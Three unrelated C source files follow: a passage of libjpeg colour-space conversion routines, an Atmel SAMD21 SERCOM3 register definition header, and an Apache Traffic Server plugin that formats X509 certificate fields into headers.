offset to R => Y section */ #define G_Y_OFF (1*(MAXJSAMPLE+1)) /* offset to G => Y section */ #define B_Y_OFF (2*(MAXJSAMPLE+1)) /* etc. */ #define R_CB_OFF (3*(MAXJSAMPLE+1)) #define G_CB_OFF (4*(MAXJSAMPLE+1)) #define B_CB_OFF (5*(MAXJSAMPLE+1)) #define R_CR_OFF B_CB_OFF /* B=>Cb, R=>Cr are the same */ #define G_CR_OFF (6*(MAXJSAMPLE+1)) #define B_CR_OFF (7*(MAXJSAMPLE+1)) #define TABLE_SIZE (8*(MAXJSAMPLE+1)) /* * Initialize for RGB->YCC colorspace conversion. */ METHODDEF(void) rgb_ycc_start (j_compress_ptr cinfo) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; INT32 * rgb_ycc_tab; INT32 i; /* Allocate and fill in the conversion tables. */ cconvert->rgb_ycc_tab = rgb_ycc_tab = (INT32 *) (*cinfo->mem->alloc_small) ((j_common_ptr) cinfo, JPOOL_IMAGE, (TABLE_SIZE * SIZEOF(INT32))); for (i = 0; i <= MAXJSAMPLE; i++) { rgb_ycc_tab[i+R_Y_OFF] = FIX(0.299) * i; rgb_ycc_tab[i+G_Y_OFF] = FIX(0.587) * i; rgb_ycc_tab[i+B_Y_OFF] = FIX(0.114) * i + ONE_HALF; rgb_ycc_tab[i+R_CB_OFF] = (-FIX(0.168735892)) * i; rgb_ycc_tab[i+G_CB_OFF] = (-FIX(0.331264108)) * i; /* We use a rounding fudge-factor of 0.5-epsilon for Cb and Cr. * This ensures that the maximum output will round to MAXJSAMPLE * not MAXJSAMPLE+1, and thus that we don't have to range-limit. */ rgb_ycc_tab[i+B_CB_OFF] = FIX(0.5) * i + CBCR_OFFSET + ONE_HALF-1; /* B=>Cb and R=>Cr tables are the same rgb_ycc_tab[i+R_CR_OFF] = FIX(0.5) * i + CBCR_OFFSET + ONE_HALF-1; */ rgb_ycc_tab[i+G_CR_OFF] = (-FIX(0.418687589)) * i; rgb_ycc_tab[i+B_CR_OFF] = (-FIX(0.081312411)) * i; } } /* * Convert some rows of samples to the JPEG colorspace. * * Note that we change from the application's interleaved-pixel format * to our internal noninterleaved, one-plane-per-component format. * The input buffer is therefore three times as wide as the output buffer. * * A starting row offset is provided only for the output buffer. The caller * can easily adjust the passed input_buf value to accommodate any row * offset required on that side. */ METHODDEF(void) rgb_ycc_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; register INT32 * ctab = cconvert->rgb_ycc_tab; register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr0, outptr1, outptr2; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr0 = output_buf[0][output_row]; outptr1 = output_buf[1][output_row]; outptr2 = output_buf[2][output_row]; output_row++; for (col = 0; col < num_cols; col++) { r = GETJSAMPLE(inptr[RGB_RED]); g = GETJSAMPLE(inptr[RGB_GREEN]); b = GETJSAMPLE(inptr[RGB_BLUE]); /* If the inputs are 0..MAXJSAMPLE, the outputs of these equations * must be too; we do not need an explicit range-limiting operation. * Hence the value being shifted is never negative, and we don't * need the general RIGHT_SHIFT macro. */ /* Y */ outptr0[col] = (JSAMPLE) ((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF]) >> SCALEBITS); /* Cb */ outptr1[col] = (JSAMPLE) ((ctab[r+R_CB_OFF] + ctab[g+G_CB_OFF] + ctab[b+B_CB_OFF]) >> SCALEBITS); /* Cr */ outptr2[col] = (JSAMPLE) ((ctab[r+R_CR_OFF] + ctab[g+G_CR_OFF] + ctab[b+B_CR_OFF]) >> SCALEBITS); inptr += RGB_PIXELSIZE; } } } /**************** Cases other than RGB -> YCbCr **************/ /* * Convert some rows of samples to the JPEG colorspace. * This version handles RGB->grayscale conversion, which is the same * as the RGB->Y portion of RGB->YCbCr. * We assume rgb_ycc_start has been called (we only use the Y tables). */ METHODDEF(void) rgb_gray_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; register INT32 * ctab = cconvert->rgb_ycc_tab; register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr = output_buf[0][output_row++]; for (col = 0; col < num_cols; col++) { r = GETJSAMPLE(inptr[RGB_RED]); g = GETJSAMPLE(inptr[RGB_GREEN]); b = GETJSAMPLE(inptr[RGB_BLUE]); /* Y */ outptr[col] = (JSAMPLE) ((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF]) >> SCALEBITS); inptr += RGB_PIXELSIZE; } } } /* * Convert some rows of samples to the JPEG colorspace. * This version handles Adobe-style CMYK->YCCK conversion, * where we convert R=1-C, G=1-M, and B=1-Y to YCbCr using the same * conversion as above, while passing K (black) unchanged. * We assume rgb_ycc_start has been called. */ METHODDEF(void) cmyk_ycck_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { my_cconvert_ptr cconvert = (my_cconvert_ptr) cinfo->cconvert; register INT32 * ctab = cconvert->rgb_ycc_tab; register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr0, outptr1, outptr2, outptr3; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr0 = output_buf[0][output_row]; outptr1 = output_buf[1][output_row]; outptr2 = output_buf[2][output_row]; outptr3 = output_buf[3][output_row]; output_row++; for (col = 0; col < num_cols; col++) { r = MAXJSAMPLE - GETJSAMPLE(inptr[0]); g = MAXJSAMPLE - GETJSAMPLE(inptr[1]); b = MAXJSAMPLE - GETJSAMPLE(inptr[2]); /* K passes through as-is */ outptr3[col] = inptr[3]; /* don't need GETJSAMPLE here */ /* If the inputs are 0..MAXJSAMPLE, the outputs of these equations * must be too; we do not need an explicit range-limiting operation. * Hence the value being shifted is never negative, and we don't * need the general RIGHT_SHIFT macro. */ /* Y */ outptr0[col] = (JSAMPLE) ((ctab[r+R_Y_OFF] + ctab[g+G_Y_OFF] + ctab[b+B_Y_OFF]) >> SCALEBITS); /* Cb */ outptr1[col] = (JSAMPLE) ((ctab[r+R_CB_OFF] + ctab[g+G_CB_OFF] + ctab[b+B_CB_OFF]) >> SCALEBITS); /* Cr */ outptr2[col] = (JSAMPLE) ((ctab[r+R_CR_OFF] + ctab[g+G_CR_OFF] + ctab[b+B_CR_OFF]) >> SCALEBITS); inptr += 4; } } } /* * Convert some rows of samples to the JPEG colorspace. * [R,G,B] to [R-G,G,B-G] conversion with modulo calculation * (forward reversible color transform). * This can be seen as an adaption of the general RGB->YCbCr * conversion equation with Kr = Kb = 0, while replacing the * normalization by modulo calculation. */ METHODDEF(void) rgb_rgb1_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { register int r, g, b; register JSAMPROW inptr; register JSAMPROW outptr0, outptr1, outptr2; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr0 = output_buf[0][output_row]; outptr1 = output_buf[1][output_row]; outptr2 = output_buf[2][output_row]; output_row++; for (col = 0; col < num_cols; col++) { r = GETJSAMPLE(inptr[RGB_RED]); g = GETJSAMPLE(inptr[RGB_GREEN]); b = GETJSAMPLE(inptr[RGB_BLUE]); /* Assume that MAXJSAMPLE+1 is a power of 2, so that the MOD * (modulo) operator is equivalent to the bitmask operator AND. */ outptr0[col] = (JSAMPLE) ((r - g + CENTERJSAMPLE) & MAXJSAMPLE); outptr1[col] = (JSAMPLE) g; outptr2[col] = (JSAMPLE) ((b - g + CENTERJSAMPLE) & MAXJSAMPLE); inptr += RGB_PIXELSIZE; } } } /* * Convert some rows of samples to the JPEG colorspace. * This version handles grayscale output with no conversion. * The source can be either plain grayscale or YCC (since Y == gray). */ METHODDEF(void) grayscale_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { int instride = cinfo->input_components; register JSAMPROW inptr; register JSAMPROW outptr; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr = output_buf[0][output_row++]; for (col = 0; col < num_cols; col++) { outptr[col] = inptr[0]; /* don't need GETJSAMPLE() here */ inptr += instride; } } } /* * Convert some rows of samples to the JPEG colorspace. * No colorspace conversion, but change from interleaved * to separate-planes representation. */ METHODDEF(void) rgb_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { register JSAMPROW inptr; register JSAMPROW outptr0, outptr1, outptr2; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { inptr = *input_buf++; outptr0 = output_buf[0][output_row]; outptr1 = output_buf[1][output_row]; outptr2 = output_buf[2][output_row]; output_row++; for (col = 0; col < num_cols; col++) { /* We can dispense with GETJSAMPLE() here */ outptr0[col] = inptr[RGB_RED]; outptr1[col] = inptr[RGB_GREEN]; outptr2[col] = inptr[RGB_BLUE]; inptr += RGB_PIXELSIZE; } } } /* * Convert some rows of samples to the JPEG colorspace. * This version handles multi-component colorspaces without conversion. * We assume input_components == num_components. */ METHODDEF(void) null_convert (j_compress_ptr cinfo, JSAMPARRAY input_buf, JSAMPIMAGE output_buf, JDIMENSION output_row, int num_rows) { int ci; register int nc = cinfo->num_components; register JSAMPROW inptr; register JSAMPROW outptr; register JDIMENSION col; JDIMENSION num_cols = cinfo->image_width; while (--num_rows >= 0) { /* It seems fastest to make a separate pass for each component. */ for (ci = 0; ci < nc; ci++) { inptr = input_buf[0] + ci; outptr = output_buf[ci][output_row]; for (col = 0; col < num_cols; col++) { *outptr++ = *inptr; /* don't need GETJSAMPLE() here */ inptr += nc; } } input_buf++; output_row++; } } /* * Empty method for start_pass. */ METHODDEF(void) null_method (j_compress_ptr cinfo) { /* no work needed */ } /* * Module initialization routine for input colorspace conversion. */ GLOBAL(void) jinit_color_converter (j_compress_ptr cinfo) { my_cconvert_ptr cconvert; cconvert = (my_cconvert_ptr) (*cinfo->mem->alloc_small) ((j_common_ptr) cinfo, JPOOL_IMAGE, SIZEOF(my_color_converter)); cinfo->cconvert = &cconvert->pub; /* set start_pass to null method until we find out differently */ cconvert->pub.start_pass = null_method; /* Make sure input_components agrees with in_color_space */ switch (cinfo->in_color_space) { case JCS_GRAYSCALE: if (cinfo->input_components != 1) ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE); break; case JCS_RGB: case JCS_BG_RGB: if (cinfo->input_components != RGB_PIXELSIZE) ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE); break; case JCS_YCbCr: case JCS_BG_YCC: if (cinfo->input_components != 3) ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE); break; case JCS_CMYK: case JCS_YCCK: if (cinfo->input_components != 4) ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE); break; default: /* JCS_UNKNOWN can be anything */ if (cinfo->input_components < 1) ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE); break; } /* Support color transform only for RGB colorspaces */ if (cinfo->color_transform && cinfo->jpeg_color_space != JCS_RGB && cinfo->jpeg_color_space != JCS_BG_RGB) ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); /* Check num_components, set conversion method based on requested space */ switch (cinfo->jpeg_color_space) { case JCS_GRAYSCALE: if (cinfo->num_components != 1) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); switch (cinfo->in_color_space) { case JCS_GRAYSCALE: case JCS_YCbCr: case JCS_BG_YCC: cconvert->pub.color_convert = grayscale_convert; break; case JCS_RGB: cconvert->pub.start_pass = rgb_ycc_start; cconvert->pub.color_convert = rgb_gray_convert; break; default: ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); } break; case JCS_RGB: case JCS_BG_RGB: if (cinfo->num_components != 3) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); if (cinfo->in_color_space == cinfo->jpeg_color_space) { switch (cinfo->color_transform) { case JCT_NONE: cconvert->pub.color_convert = rgb_convert; break; case JCT_SUBTRACT_GREEN: cconvert->pub.color_convert = rgb_rgb1_convert; break; default: ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); } } else ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); break; case JCS_YCbCr: if (cinfo->num_components != 3) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); switch (cinfo->in_color_space) { case JCS_RGB: cconvert->pub.start_pass = rgb_ycc_start; cconvert->pub.color_convert = rgb_ycc_convert; break; case JCS_YCbCr: cconvert->pub.color_convert = null_convert; break; default: ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); } break; case JCS_BG_YCC: if (cinfo->num_components != 3) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); switch (cinfo->in_color_space) { case JCS_RGB: /* For conversion from normal RGB input to BG_YCC representation, * the Cb/Cr values are first computed as usual, and then * quantized further after DCT processing by a factor of * 2 in reference to the nominal quantization factor. */ /* need quantization scale by factor of 2 after DCT */ cinfo->comp_info[1].component_needed = TRUE; cinfo->comp_info[2].component_needed = TRUE; /* compute normal YCC first */ cconvert->pub.start_pass = rgb_ycc_start; cconvert->pub.color_convert = rgb_ycc_convert; break; case JCS_YCbCr: /* need quantization scale by factor of 2 after DCT */ cinfo->comp_info[1].component_needed = TRUE; cinfo->comp_info[2].component_needed = TRUE; /*FALLTHROUGH*/ case JCS_BG_YCC: /* Pass through for BG_YCC input */ cconvert->pub.color_convert = null_convert; break; default: ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); } break; case JCS_CMYK: if (cinfo->num_components != 4) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); if (cinfo->in_color_space == JCS_CMYK) cconvert->pub.color_convert = null_convert; else ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); break; case JCS_YCCK: if (cinfo->num_components != 4) ERREXIT(cinfo, JERR_BAD_J_COLORSPACE); switch (cinfo->in_color_space) { case JCS_CMYK: cconvert->pub.start_pass = rgb_ycc_start; cconvert->pub.color_convert = cmyk_ycck_convert; break; case JCS_YCCK: cconvert->pub.color_convert = null_convert; break; default: ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); } break; default: /* allow null conversion of JCS_UNKNOWN */ if (cinfo->jpeg_color_space != cinfo->in_color_space || cinfo->num_components != cinfo->input_components) ERREXIT(cinfo, JERR_CONVERSION_NOTIMPL); cconvert->pub.color_convert = null_convert; break; } }
{ "language": "C" }
/** * \file * * \brief Instance description for SERCOM3 * * Copyright (c) 2016 Atmel Corporation, * a wholly owned subsidiary of Microchip Technology Inc. * * \asf_license_start * * \page License * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the Licence at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * \asf_license_stop * */ #ifndef _SAMD21_SERCOM3_INSTANCE_ #define _SAMD21_SERCOM3_INSTANCE_ /* ========== Register definition for SERCOM3 peripheral ========== */ #if (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) #define REG_SERCOM3_I2CM_CTRLA (0x42001400) /**< \brief (SERCOM3) I2CM Control A */ #define REG_SERCOM3_I2CM_CTRLB (0x42001404) /**< \brief (SERCOM3) I2CM Control B */ #define REG_SERCOM3_I2CM_BAUD (0x4200140C) /**< \brief (SERCOM3) I2CM Baud Rate */ #define REG_SERCOM3_I2CM_INTENCLR (0x42001414) /**< \brief (SERCOM3) I2CM Interrupt Enable Clear */ #define REG_SERCOM3_I2CM_INTENSET (0x42001416) /**< \brief (SERCOM3) I2CM Interrupt Enable Set */ #define REG_SERCOM3_I2CM_INTFLAG (0x42001418) /**< \brief (SERCOM3) I2CM Interrupt Flag Status and Clear */ #define REG_SERCOM3_I2CM_STATUS (0x4200141A) /**< \brief (SERCOM3) I2CM Status */ #define REG_SERCOM3_I2CM_SYNCBUSY (0x4200141C) /**< \brief (SERCOM3) I2CM Synchronization Busy */ #define REG_SERCOM3_I2CM_ADDR (0x42001424) /**< \brief (SERCOM3) I2CM Address */ #define REG_SERCOM3_I2CM_DATA (0x42001428) /**< \brief (SERCOM3) I2CM Data */ #define REG_SERCOM3_I2CM_DBGCTRL (0x42001430) /**< \brief (SERCOM3) I2CM Debug Control */ #define REG_SERCOM3_I2CS_CTRLA (0x42001400) /**< \brief (SERCOM3) I2CS Control A */ #define REG_SERCOM3_I2CS_CTRLB (0x42001404) /**< \brief (SERCOM3) I2CS Control B */ #define REG_SERCOM3_I2CS_INTENCLR (0x42001414) /**< \brief (SERCOM3) I2CS Interrupt Enable Clear */ #define REG_SERCOM3_I2CS_INTENSET (0x42001416) /**< \brief (SERCOM3) I2CS Interrupt Enable Set */ #define REG_SERCOM3_I2CS_INTFLAG (0x42001418) /**< \brief (SERCOM3) I2CS Interrupt Flag Status and Clear */ #define REG_SERCOM3_I2CS_STATUS (0x4200141A) /**< \brief (SERCOM3) I2CS Status */ #define REG_SERCOM3_I2CS_SYNCBUSY (0x4200141C) /**< \brief (SERCOM3) I2CS Synchronization Busy */ #define REG_SERCOM3_I2CS_ADDR (0x42001424) /**< \brief (SERCOM3) I2CS Address */ #define REG_SERCOM3_I2CS_DATA (0x42001428) /**< \brief (SERCOM3) I2CS Data */ #define REG_SERCOM3_SPI_CTRLA (0x42001400) /**< \brief (SERCOM3) SPI Control A */ #define REG_SERCOM3_SPI_CTRLB (0x42001404) /**< \brief (SERCOM3) SPI Control B */ #define REG_SERCOM3_SPI_BAUD (0x4200140C) /**< \brief (SERCOM3) SPI Baud Rate */ #define REG_SERCOM3_SPI_INTENCLR (0x42001414) /**< \brief (SERCOM3) SPI Interrupt Enable Clear */ #define REG_SERCOM3_SPI_INTENSET (0x42001416) /**< \brief (SERCOM3) SPI Interrupt Enable Set */ #define REG_SERCOM3_SPI_INTFLAG (0x42001418) /**< \brief (SERCOM3) SPI Interrupt Flag Status and Clear */ #define REG_SERCOM3_SPI_STATUS (0x4200141A) /**< \brief (SERCOM3) SPI Status */ #define REG_SERCOM3_SPI_SYNCBUSY (0x4200141C) /**< \brief (SERCOM3) SPI Synchronization Busy */ #define REG_SERCOM3_SPI_ADDR (0x42001424) /**< \brief (SERCOM3) SPI Address */ #define REG_SERCOM3_SPI_DATA (0x42001428) /**< \brief (SERCOM3) SPI Data */ #define REG_SERCOM3_SPI_DBGCTRL (0x42001430) /**< \brief (SERCOM3) SPI Debug Control */ #define REG_SERCOM3_USART_CTRLA (0x42001400) /**< \brief (SERCOM3) USART Control A */ #define REG_SERCOM3_USART_CTRLB (0x42001404) /**< \brief (SERCOM3) USART Control B */ #define REG_SERCOM3_USART_BAUD (0x4200140C) /**< \brief (SERCOM3) USART Baud Rate */ #define REG_SERCOM3_USART_RXPL (0x4200140E) /**< \brief (SERCOM3) USART Receive Pulse Length */ #define REG_SERCOM3_USART_INTENCLR (0x42001414) /**< \brief (SERCOM3) USART Interrupt Enable Clear */ #define REG_SERCOM3_USART_INTENSET (0x42001416) /**< \brief (SERCOM3) USART Interrupt Enable Set */ #define REG_SERCOM3_USART_INTFLAG (0x42001418) /**< \brief (SERCOM3) USART Interrupt Flag Status and Clear */ #define REG_SERCOM3_USART_STATUS (0x4200141A) /**< \brief (SERCOM3) USART Status */ #define REG_SERCOM3_USART_SYNCBUSY (0x4200141C) /**< \brief (SERCOM3) USART Synchronization Busy */ #define REG_SERCOM3_USART_DATA (0x42001428) /**< \brief (SERCOM3) USART Data */ #define REG_SERCOM3_USART_DBGCTRL (0x42001430) /**< \brief (SERCOM3) USART Debug Control */ #else #define REG_SERCOM3_I2CM_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (SERCOM3) I2CM Control A */ #define REG_SERCOM3_I2CM_CTRLB (*(RwReg *)0x42001404UL) /**< \brief (SERCOM3) I2CM Control B */ #define REG_SERCOM3_I2CM_BAUD (*(RwReg *)0x4200140CUL) /**< \brief (SERCOM3) I2CM Baud Rate */ #define REG_SERCOM3_I2CM_INTENCLR (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) I2CM Interrupt Enable Clear */ #define REG_SERCOM3_I2CM_INTENSET (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) I2CM Interrupt Enable Set */ #define REG_SERCOM3_I2CM_INTFLAG (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) I2CM Interrupt Flag Status and Clear */ #define REG_SERCOM3_I2CM_STATUS (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) I2CM Status */ #define REG_SERCOM3_I2CM_SYNCBUSY (*(RoReg *)0x4200141CUL) /**< \brief (SERCOM3) I2CM Synchronization Busy */ #define REG_SERCOM3_I2CM_ADDR (*(RwReg *)0x42001424UL) /**< \brief (SERCOM3) I2CM Address */ #define REG_SERCOM3_I2CM_DATA (*(RwReg8 *)0x42001428UL) /**< \brief (SERCOM3) I2CM Data */ #define REG_SERCOM3_I2CM_DBGCTRL (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) I2CM Debug Control */ #define REG_SERCOM3_I2CS_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (SERCOM3) I2CS Control A */ #define REG_SERCOM3_I2CS_CTRLB (*(RwReg *)0x42001404UL) /**< \brief (SERCOM3) I2CS Control B */ #define REG_SERCOM3_I2CS_INTENCLR (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) I2CS Interrupt Enable Clear */ #define REG_SERCOM3_I2CS_INTENSET (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) I2CS Interrupt Enable Set */ #define REG_SERCOM3_I2CS_INTFLAG (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) I2CS Interrupt Flag Status and Clear */ #define REG_SERCOM3_I2CS_STATUS (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) I2CS Status */ #define REG_SERCOM3_I2CS_SYNCBUSY (*(RoReg *)0x4200141CUL) /**< \brief (SERCOM3) I2CS Synchronization Busy */ #define REG_SERCOM3_I2CS_ADDR (*(RwReg *)0x42001424UL) /**< \brief (SERCOM3) I2CS Address */ #define REG_SERCOM3_I2CS_DATA (*(RwReg8 *)0x42001428UL) /**< \brief (SERCOM3) I2CS Data */ #define REG_SERCOM3_SPI_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (SERCOM3) SPI Control A */ #define REG_SERCOM3_SPI_CTRLB (*(RwReg *)0x42001404UL) /**< \brief (SERCOM3) SPI Control B */ #define REG_SERCOM3_SPI_BAUD (*(RwReg8 *)0x4200140CUL) /**< \brief (SERCOM3) SPI Baud Rate */ #define REG_SERCOM3_SPI_INTENCLR (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) SPI Interrupt Enable Clear */ #define REG_SERCOM3_SPI_INTENSET (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) SPI Interrupt Enable Set */ #define REG_SERCOM3_SPI_INTFLAG (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) SPI Interrupt Flag Status and Clear */ #define REG_SERCOM3_SPI_STATUS (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) SPI Status */ #define REG_SERCOM3_SPI_SYNCBUSY (*(RoReg *)0x4200141CUL) /**< \brief (SERCOM3) SPI Synchronization Busy */ #define REG_SERCOM3_SPI_ADDR (*(RwReg *)0x42001424UL) /**< \brief (SERCOM3) SPI Address */ #define REG_SERCOM3_SPI_DATA (*(RwReg *)0x42001428UL) /**< \brief (SERCOM3) SPI Data */ #define REG_SERCOM3_SPI_DBGCTRL (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) SPI Debug Control */ #define REG_SERCOM3_USART_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (SERCOM3) USART Control A */ #define REG_SERCOM3_USART_CTRLB (*(RwReg *)0x42001404UL) /**< \brief (SERCOM3) USART Control B */ #define REG_SERCOM3_USART_BAUD (*(RwReg16*)0x4200140CUL) /**< \brief (SERCOM3) USART Baud Rate */ #define REG_SERCOM3_USART_RXPL (*(RwReg8 *)0x4200140EUL) /**< \brief (SERCOM3) USART Receive Pulse Length */ #define REG_SERCOM3_USART_INTENCLR (*(RwReg8 *)0x42001414UL) /**< \brief (SERCOM3) USART Interrupt Enable Clear */ #define REG_SERCOM3_USART_INTENSET (*(RwReg8 *)0x42001416UL) /**< \brief (SERCOM3) USART Interrupt Enable Set */ #define REG_SERCOM3_USART_INTFLAG (*(RwReg8 *)0x42001418UL) /**< \brief (SERCOM3) USART Interrupt Flag Status and Clear */ #define REG_SERCOM3_USART_STATUS (*(RwReg16*)0x4200141AUL) /**< \brief (SERCOM3) USART Status */ #define REG_SERCOM3_USART_SYNCBUSY (*(RoReg *)0x4200141CUL) /**< \brief (SERCOM3) USART Synchronization Busy */ #define REG_SERCOM3_USART_DATA (*(RwReg16*)0x42001428UL) /**< \brief (SERCOM3) USART Data */ #define REG_SERCOM3_USART_DBGCTRL (*(RwReg8 *)0x42001430UL) /**< \brief (SERCOM3) USART Debug Control */ #endif /* (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */ /* ========== Instance parameters for SERCOM3 peripheral ========== */ #define SERCOM3_DMAC_ID_RX 7 // Index of DMA RX trigger #define SERCOM3_DMAC_ID_TX 8 // Index of DMA TX trigger #define SERCOM3_GCLK_ID_CORE 23 // Index of Generic Clock for Core #define SERCOM3_GCLK_ID_SLOW 19 // Index of Generic Clock for SMbus timeout #define SERCOM3_INT_MSB 6 #endif /* _SAMD21_SERCOM3_INSTANCE_ */
{ "language": "C" }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <array> #include "sslheaders.h" #include <openssl/x509.h> #include <openssl/pem.h> using x509_expansion = void (*)(X509 *, BIO *); static void x509_expand_none(X509 *, BIO *) { // placeholder } static void x509_expand_certificate(X509 *x509, BIO *bio) { long remain; char *ptr; PEM_write_bio_X509(bio, x509); // The PEM format has newlines in it. mod_ssl replaces those with spaces. remain = BIO_get_mem_data(bio, &ptr); for (char *nl; (nl = static_cast<char *>(memchr(ptr, '\n', remain))); ptr = nl) { *nl = ' '; remain -= nl - ptr; } } static void x509_expand_subject(X509 *x509, BIO *bio) { X509_NAME *name = X509_get_subject_name(x509); X509_NAME_print_ex(bio, name, 0 /* indent */, XN_FLAG_ONELINE); } static void x509_expand_issuer(X509 *x509, BIO *bio) { X509_NAME *name = X509_get_issuer_name(x509); X509_NAME_print_ex(bio, name, 0 /* indent */, XN_FLAG_ONELINE); } static void x509_expand_serial(X509 *x509, BIO *bio) { ASN1_INTEGER *serial = X509_get_serialNumber(x509); i2a_ASN1_INTEGER(bio, serial); } static void x509_expand_signature(X509 *x509, BIO *bio) { const ASN1_BIT_STRING *sig; #if OPENSSL_VERSION_NUMBER >= 0x010100000 X509_get0_signature(&sig, nullptr, x509); #elif OPENSSL_VERSION_NUMBER >= 0x010002000 X509_get0_signature(const_cast<ASN1_BIT_STRING **>(&sig), nullptr, x509); #else sig = x509->signature; #endif const char *ptr = reinterpret_cast<const char *>(sig->data); const char *end = ptr + sig->length; // The canonical OpenSSL way to format the signature seems to be // X509_signature_dump(). However that separates each byte with a ':', which is // human readable, but would be annoying to parse out of headers. We format as // uppercase hex to match the serial number formatting. for (; ptr < end; ++ptr) { BIO_printf(bio, "%02X", static_cast<unsigned char>(*ptr)); } } static void x509_expand_notbefore(X509 *x509, BIO *bio) { ASN1_TIME *time = X509_get_notBefore(x509); ASN1_TIME_print(bio, time); } static void x509_expand_notafter(X509 *x509, BIO *bio) { ASN1_TIME *time = X509_get_notAfter(x509); ASN1_TIME_print(bio, time); } static const std::array<x509_expansion, SSL_HEADERS_FIELD_MAX> expansions = {{ x509_expand_none, // SSL_HEADERS_FIELD_NONE x509_expand_certificate, // SSL_HEADERS_FIELD_CERTIFICATE x509_expand_subject, // SSL_HEADERS_FIELD_SUBJECT x509_expand_issuer, // SSL_HEADERS_FIELD_ISSUER x509_expand_serial, // SSL_HEADERS_FIELD_SERIAL x509_expand_signature, // SSL_HEADERS_FIELD_SIGNATURE x509_expand_notbefore, // SSL_HEADERS_FIELD_NOTBEFORE x509_expand_notafter, // SSL_HEADERS_FIELD_NOTAFTER }}; bool SslHdrExpandX509Field(BIO *bio, X509 *x509, ExpansionField field) { // Rewind the BIO. (void)BIO_reset(bio); if (field < expansions.size()) { expansions[field](x509, bio); } #if 0 if (BIO_pending(bio)) { long len; char * ptr; len = BIO_get_mem_data(bio, &ptr); SslHdrDebug("X509 field %d: %.*s", (int)field, (int)len, ptr); } #endif return true; }
{ "language": "C" }
